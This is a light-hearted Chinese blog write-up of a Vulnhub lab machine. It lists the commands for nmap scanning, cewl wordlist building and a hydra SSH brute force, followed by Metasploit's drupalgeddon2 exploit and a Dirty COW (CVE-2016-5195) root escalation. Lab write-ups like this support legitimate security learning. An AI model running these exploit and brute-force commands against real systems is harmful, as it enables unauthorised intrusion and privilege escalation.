带妹玩转Vulnhub【四】
前言
今天我们请到了炫酷的女装大佬,和我一起为大家进行讲解,这次就不带妹子玩了,毕竟有女装大佬,真香!?
带妹是不可能带妹的,这辈子都不可能带妹的?
开始
下载
同样的在Vulnhub
上下载对应的镜像下载链接
基本配置
这都已经第四篇了,就不多介绍了。参考着官网上的说明来就可以咯,我这英语不及格的都能看懂,各位朋友还看不懂么??
女装大佬鄙夷的眼神?,切!
主机发现
netdiscover -r 192.168.43.0/24
端口扫描
使用nmap 192.168.43.52
,这里吸取了前面的教训,我使用如下命令进行更加详细的扫描 nmap -O -sV -p- -T4 192.168.43.52
,这样便可以尽最大可能的获取更多的信息。
渗透测试
访问80
端口一段鬼画符
看看1898
都有什么东西,是一个drupal
搭建的网站,
这又是涉及到web
了,我太菜表示没有思路,不过这种开源框架搭建的网站应该会有很多漏洞的吧,网上搜罗了一番找到了两种方法可以解决。
这时炫酷的女装大佬表示,你个菜鸡?,闪开,让我来。
只见大佬从口袋里掏出一把梭,上去就是干!
等我从眩晕中清醒过来后,发现大佬已经拿下root
此时的光芒太刺眼,我赶紧低下了头,暗暗下定决心以后再以不敢带妹了,跟着炫酷的女装大佬混准没错!真香!?
最后通过命令行,我找到了大佬操作的蛛丝马迹。
drupal漏洞利用
方法一
这里涉及到kali
下的两个工具cewl 和 hydra
关于cewl
的介绍可以参考这篇文章
通过这个工具可以针对指定的网站,生成一个单词列表
通过robtos.txt
我们可以知道一些参数提交的方式(不知道这样子描述是否正确),为了生成一个单词列表,我们需要遍历这个网站上的所有文章,所以尝试访问http://192.168.43.52:1898/?q=node/1
这个页面,便可以看到所有的文章。于是cewl
的命令如下:cewl -w wordlist.txt http://192.168.43.52:1898/?q=node/1
然后使用hydra
**ssh
登陆的用户名和密码,这个在上一篇文章有用到哦?
通过查看文章我发现两个可疑的用户名。
最后我通过如下命令进行**。hydra -L username.txt -P wordlist.txt ssh://192.168.43.52:22
可以得到用户民tiago
和密码Virgulino
方法二
我在另一篇文章中看到了可以直接使用kali
下的msf
进行攻击。
主要命令如下:
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.43.52
set rport 1898
exploit
但是我个人感觉msf
的shell
没有ssh
好用,所以最后还是选择使用ssh
进行连接
权限提升
ssh登陆并查看一些基本版本和权限信息。
根据版本号,我们可以利用CVE-2016-5195
对其进行提权,之前我也介绍过github
上别人收集的库,这里也就不具体说了,使用scp
将源代码上传至目标主机,按着要求进行编译,之后我们便可以获取root
权限。
参考的漏洞网站scp 40847.c [email protected]:40847.c
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.c -lutil
./dcow -s
这里可以使用一个脚本自动查找适合什么漏洞wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
至此已经生无可恋,这次有女装大佬带我飞,真的不要太刺激,以后端茶倒水的活就交给我好了。
炫酷的女装大佬发话了,欢迎妹子加入,包教包会。
你心动了么?方正我是心动了?
诶,大佬等等我?
只见大佬一脚油门便消失在天际,只留下一串文字
279800B8148548F6CC3F9E58D03BBCCC
这难道是在暗示我?,哦耶!!?
总结
这次总体难度不大,也不算复杂,主要是两个工具cewl 和 hydra
还有一些常见的漏洞。
人都走完了,我在路边随手解开一辆共享单车?♀️,悠然的骑走了
带妹是不可能的,这辈子都不可能的!?